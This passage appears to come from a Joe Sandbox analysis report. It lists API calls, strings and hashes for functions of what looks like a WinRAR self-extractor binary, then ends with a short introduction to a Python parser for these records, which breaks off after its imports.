                                                                                              • Opcode Fuzzy Hash: 13c42c48653b20e183d2805ae932bcd74a9eab6c249c41290ffc03f307b25d08
                                                                                              • Instruction Fuzzy Hash: 81B17C75900209EFCF1ADFA4C8C19AEBBB5FF14310F16855AF811AB212D735EA61CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 0032A6F6
                                                                                              • _wcslen.LIBCMT ref: 0032A796
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 0032A7A5
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 0032A7C6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                                                                              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                              • API String ID: 1116704506-4209811716
                                                                                              • Opcode ID: e59e101087baee2de855bdc9b008e6b0fa26f047585307942d18c85b144e3262
                                                                                              • Instruction ID: 6f85ac2ad8931030c8ff3a1c491270249cd1ced039f74216a6cc93c1ce681341
                                                                                              • Opcode Fuzzy Hash: e59e101087baee2de855bdc9b008e6b0fa26f047585307942d18c85b144e3262
                                                                                              • Instruction Fuzzy Hash: 25312C32104B217FE727ABA4AC46F6F7BACDF42710F15011EF5019E1D2EF64A94583AA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 003112F6: GetDlgItem.USER32(00000000,00003021), ref: 0031133A
                                                                                                • Part of subcall function 003112F6: SetWindowTextW.USER32(00000000,003445F4), ref: 00311350
                                                                                              • EndDialog.USER32(?,00000001), ref: 0032C800
                                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 0032C827
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0032C840
                                                                                              • SetWindowTextW.USER32(?,?), ref: 0032C851
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 0032C85A
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0032C86E
                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0032C884
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                              • String ID: LICENSEDLG
                                                                                              • API String ID: 3214253823-2177901306
                                                                                              • Opcode ID: 3b48c3adb836fca56b20ad2fb3e437f3f5abd529a059ed22fa3176c69cddf66a
                                                                                              • Instruction ID: 8ee08979ead4a2b9a022ff7954d8dbbc31bca311dfcdf8db5b2a3ab706558d00
                                                                                              • Opcode Fuzzy Hash: 3b48c3adb836fca56b20ad2fb3e437f3f5abd529a059ed22fa3176c69cddf66a
                                                                                              • Instruction Fuzzy Hash: 0121F9321602117BE6375F69FC49F7F3BACEB46B85F014418F205E60A0CBA29D419671
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 0031B5E2
                                                                                                • Part of subcall function 00322701: GetSystemTime.KERNEL32(?), ref: 0032270F
                                                                                                • Part of subcall function 00322701: SystemTimeToFileTime.KERNEL32(?,?), ref: 0032271D
                                                                                                • Part of subcall function 003226AA: __aulldiv.LIBCMT ref: 003226B3
                                                                                              • __aulldiv.LIBCMT ref: 0031B60E
                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 0031B615
                                                                                              • _swprintf.LIBCMT ref: 0031B640
                                                                                                • Part of subcall function 00314A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00314A33
                                                                                              • _wcslen.LIBCMT ref: 0031B64A
                                                                                              • _swprintf.LIBCMT ref: 0031B6A0
                                                                                              • _wcslen.LIBCMT ref: 0031B6AA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
                                                                                              • String ID: %u.%03u
                                                                                              • API String ID: 2956649372-1114938957
                                                                                              • Opcode ID: 70fc23cd38fb687dafd800c0cc8e491d31670358991d3a94646731ae0d16c3c9
                                                                                              • Instruction ID: 3c2b3b7910c87d40b8ac5b800152fdde59616bfcfd444d85724e9b9c0f81664f
                                                                                              • Opcode Fuzzy Hash: 70fc23cd38fb687dafd800c0cc8e491d31670358991d3a94646731ae0d16c3c9
                                                                                              • Instruction Fuzzy Hash: 7C2195B2A043006FD716EF65CC85D9BB7ECEBD8710F04492AF545DB241DB34EA4887A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0032BC3F
                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0032BC50
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 0032BC5E
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0032BC6C
                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0032BC87
                                                                                              • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 0032BCAE
                                                                                              • _swprintf.LIBCMT ref: 0032BCD4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$System$File$Format$DateLocalSpecific_swprintf
                                                                                              • String ID: %s %s
                                                                                              • API String ID: 385609497-2939940506
                                                                                              • Opcode ID: 9b3965f5e2a8d30349a7f353731a078d7aff37c8de5bf3dd6ff4a3697462082e
                                                                                              • Instruction ID: 5f3ebbe309b3d38beb40a405b6820d082baaf329d6e36b4e646a9828775e975a
                                                                                              • Opcode Fuzzy Hash: 9b3965f5e2a8d30349a7f353731a078d7aff37c8de5bf3dd6ff4a3697462082e
                                                                                              • Instruction Fuzzy Hash: E821D6B654115CABDB22DFA1EC45EEF7BACFF1A704F050426FA05D6111EB20EA49CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,0031C43F,0031C441,00000000,00000000,6BE19C46,00000001,00000000,00000000,0031C32C,?,?,?,0031C43F,ROOT\CIMV2), ref: 00330F59
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,0031C43F,?,00000000,00000000,?,?,?,?,?,0031C43F), ref: 00330FD4
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00330FDF
                                                                                              • _com_issue_error.COMSUPP ref: 00331008
                                                                                              • _com_issue_error.COMSUPP ref: 00331012
                                                                                              • GetLastError.KERNEL32(80070057,6BE19C46,00000001,00000000,00000000,0031C32C,?,?,?,0031C43F,ROOT\CIMV2), ref: 00331017
                                                                                              • _com_issue_error.COMSUPP ref: 0033102A
                                                                                              • GetLastError.KERNEL32(00000000,?,0031C43F,ROOT\CIMV2), ref: 00331040
                                                                                              • _com_issue_error.COMSUPP ref: 00331053
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                              • String ID:
                                                                                              • API String ID: 1353541977-0
                                                                                              • Opcode ID: 1b0ceed0905a78cabca182e52b36243c540066ade633a68c3aae92a0f371ec66
                                                                                              • Instruction ID: c3ecbbe30ebd0c83858f27e4abcac682f4c7e2cf86929e75ca5b98f78b352ed3
                                                                                              • Opcode Fuzzy Hash: 1b0ceed0905a78cabca182e52b36243c540066ade633a68c3aae92a0f371ec66
                                                                                              • Instruction Fuzzy Hash: 484118B5A04305AFD716DF68DC85BAFBBB8EF49710F104229F405EB280DB75A940CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                              • API String ID: 3519838083-3505469590
                                                                                              • Opcode ID: 22149ba23b7113966ef524f95054e16e01e2c22c5c10380578ec85b773b39e0a
                                                                                              • Instruction ID: 4711c16165646bc1e793c5faa5c8926babdca732e2a435c7cd39b79e7c7f99be
                                                                                              • Opcode Fuzzy Hash: 22149ba23b7113966ef524f95054e16e01e2c22c5c10380578ec85b773b39e0a
                                                                                              • Instruction Fuzzy Hash: 65719D75A506199FDB1ADFA5CC94AFEB7B9FF4D310B010569E402EB2A0CB30AD41CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0031A5EE
                                                                                              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0031A611
                                                                                              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0031A630
                                                                                                • Part of subcall function 0031D6A7: _wcslen.LIBCMT ref: 0031D6AF
                                                                                                • Part of subcall function 00323316: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013316,0031D523,00000000,.exe,?,?,00000800,?,?,?,00329E5C), ref: 0032332C
                                                                                              • _swprintf.LIBCMT ref: 0031A6CC
                                                                                                • Part of subcall function 00314A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00314A33
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 0031A73B
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 0031A77B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                              • String ID: rtmp%d
                                                                                              • API String ID: 3726343395-3303766350
                                                                                              • Opcode ID: f7c81afdb7db7b532703864f46f871c1652a6ee4ec82aa38773892a218c28b6a
                                                                                              • Instruction ID: 279204a35045f65e6caed3d01f4f43b5cbf1c1e27813b276da9658e97dd37b42
                                                                                              • Opcode Fuzzy Hash: f7c81afdb7db7b532703864f46f871c1652a6ee4ec82aa38773892a218c28b6a
                                                                                              • Instruction Fuzzy Hash: AA417E71901A286ACF26EBA0CC45EEFB37CBF59341F0804A5B545A7085EB359BC58F61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

APIs
• __aulldiv.LIBCMT ref: 0032254E
  • Part of subcall function 0031C619: GetVersionExW.KERNEL32(?), ref: 0031C63E
• FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,00000001), ref: 00322571
• FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,00000001), ref: 00322583
• SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00322594
• SystemTimeToFileTime.KERNEL32(?,?), ref: 003225A4
• SystemTimeToFileTime.KERNEL32(?,?), ref: 003225B4
• FileTimeToSystemTime.KERNEL32(?,?,?), ref: 003225EF
• __aullrem.LIBCMT ref: 00322699
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
• String ID:
• API String ID: 1247370737-0
• Opcode ID: f8aa1ce86612094b8e856c2c1535526eb17da9763e9361534f40f37340d9c7d4
• Instruction ID: be2b9a7c31d8320b3421b0d90559c0baa0d7e01eb7d31b8cfdd652849c179c9a
• Opcode Fuzzy Hash: f8aa1ce86612094b8e856c2c1535526eb17da9763e9361534f40f37340d9c7d4
• Instruction Fuzzy Hash: 964137B6508305AFC715DF65D880A6BFBE9FF88314F00892EF996C6210E774E549CB62
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: _wcslen
• String ID: </p>$</style>$<br>$<style>$>
• API String ID: 176396367-3568243669
• Opcode ID: 809a86d818db8e33d3b3c14b737686928fb2d8823805918154ce5c2ae8e7c647
• Instruction ID: 3bd264c25a388eb2491823cafba96e10d76ac8906046e9e64a7d9e9a9b6df4e4
• Opcode Fuzzy Hash: 809a86d818db8e33d3b3c14b737686928fb2d8823805918154ce5c2ae8e7c647
• Instruction Fuzzy Hash: E451F576640B7393DB329A14A82177673E4DF64751F6A442BF9C08F581FA648D4282A2
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00340FC2,00000000,00000000,00000000,00000000,00000000,?), ref: 0034088F
• __fassign.LIBCMT ref: 0034090A
• __fassign.LIBCMT ref: 00340925
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0034094B
• WriteFile.KERNEL32(?,00000000,00000000,00340FC2,00000000,?,?,?,?,?,?,?,?,?,00340FC2,00000000), ref: 0034096A
• WriteFile.KERNEL32(?,00000000,00000001,00340FC2,00000000,?,?,?,?,?,?,?,?,?,00340FC2,00000000), ref: 003409A3
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: ca89dca517744516206adedbfe55b2e8606fd36ece161cf508e1432a725a1987
• Instruction ID: bd006542a75b133946b9695cdb5f1269d65140ea7ce7939a6866c2864188d88e
• Opcode Fuzzy Hash: ca89dca517744516206adedbfe55b2e8606fd36ece161cf508e1432a725a1987
• Instruction Fuzzy Hash: 17519971A002499FDB16CFA4DC45FEEBBF8EF09300F15411AE655EB292D730A951CBA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• _ValidateLocalCookies.LIBCMT ref: 00333AC7
• ___except_validate_context_record.LIBVCRUNTIME ref: 00333ACF
• _ValidateLocalCookies.LIBCMT ref: 00333B58
• __IsNonwritableInCurrentImage.LIBCMT ref: 00333B83
• _ValidateLocalCookies.LIBCMT ref: 00333BD8
Strings
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 82b4d221d371ed67e706edd3b54758e292a7ad9071369a6ead99231f8aed2768
• Instruction ID: 3d53a6f3e59a807da60d4217787283d4cbf8cfe5daed02ae580c5c7a7009a01e
• Opcode Fuzzy Hash: 82b4d221d371ed67e706edd3b54758e292a7ad9071369a6ead99231f8aed2768
• Instruction Fuzzy Hash: 3B41CF34A00208EFCF12DF69C8C1A9EBBB4AF45324F15C155E814AF392C772AA45CB91
Uniqueness
Uniqueness Score: -1.00%

APIs
• ShowWindow.USER32(?,00000000), ref: 0032AF0E
• GetWindowRect.USER32(?,?), ref: 0032AF64
• ShowWindow.USER32(?,00000005,00000000), ref: 0032B001
• SetWindowTextW.USER32(?,00000000), ref: 0032B009
• ShowWindow.USER32(00000000,00000005), ref: 0032B01F
Strings
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: Window$Show$RectText
• String ID: RarHtmlClassName
• API String ID: 3937224194-1658105358
• Opcode ID: f0a4a46180fa30a0a4e4122dcc26f71012c5557961b97fd51ccdd7e328ed8864
• Instruction ID: 04beb86f0a551ea83751e16c9588fc08267c1c00c0adec42ea1b96b9fc5788c5
• Opcode Fuzzy Hash: f0a4a46180fa30a0a4e4122dcc26f71012c5557961b97fd51ccdd7e328ed8864
• Instruction Fuzzy Hash: 7C41EF72404724AFDB239F20ED48B6BBBECEB08701F554559F9899A052DBB4E844CB62
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: _wcslen
• String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
• API String ID: 176396367-3743748572
• Opcode ID: 13b83b83b445546caa00103c989ed3ef930f44429f28a36bd9d1057bda96ec3d
• Instruction ID: 3b9f548f53143e94fb2b214e400028cf5fcea8786aa0ce1c0cd6d004eeb7109d
• Opcode Fuzzy Hash: 13b83b83b445546caa00103c989ed3ef930f44429f28a36bd9d1057bda96ec3d
• Instruction Fuzzy Hash: D8315E72A44B1597D632AB54BC82B7673E4EF90720F11842FF9855B280FB50BD94C3A7
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0033DA28: _free.LIBCMT ref: 0033DA51
• _free.LIBCMT ref: 0033DAB2
  • Part of subcall function 0033A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,0033DA56,?,00000000,?,00000000,?,0033DA7D,?,00000007,?,?,0033DE7A,?), ref: 0033A680
  • Part of subcall function 0033A66A: GetLastError.KERNEL32(?,?,0033DA56,?,00000000,?,00000000,?,0033DA7D,?,00000007,?,?,0033DE7A,?,?), ref: 0033A692
• _free.LIBCMT ref: 0033DABD
• _free.LIBCMT ref: 0033DAC8
• _free.LIBCMT ref: 0033DB1C
• _free.LIBCMT ref: 0033DB27
• _free.LIBCMT ref: 0033DB32
• _free.LIBCMT ref: 0033DB3D
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
• Instruction ID: 78e51659f0a37a661feb208d323b2999452736d209d0592573248c26b2519bce
• Opcode Fuzzy Hash: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
• Instruction Fuzzy Hash: DE119071A54B04BAD622BBB1DD87FCBB7ACAF14700F440C14B29AAE062DA74B5158751
Uniqueness
Uniqueness Score: -1.00%
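The function records in this section all share one layout: an APIs list (each entry as Name.MODULE(args), ref: call-site address, with "Part of subcall function" entries nested under their caller), an optional Strings list, the memory-dump provenance, and the Joe Sandbox similarity fields (API ID, String ID, Opcode ID, Instruction ID, fuzzy hashes, Uniqueness Score). Working through hundreds of these by hand is slow, so the following Python is an added example, not code from the Joe Sandbox report or its tooling: it parses records in this layout into structured objects, pulls out the export names a function resolves at run time through GetProcAddress (the AcquireSRWLockExclusive/ReleaseSRWLockExclusive record further down is one such case), and indexes records by Opcode ID so one function can be matched across reports of related samples. The embedded SAMPLE is constructed from two of the records on this page, abridged and with the table indentation removed; the regexes assume the field names and the '$'-joined string list exactly as shown here, and nothing is assumed about how Joe Sandbox computes the IDs or hashes.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

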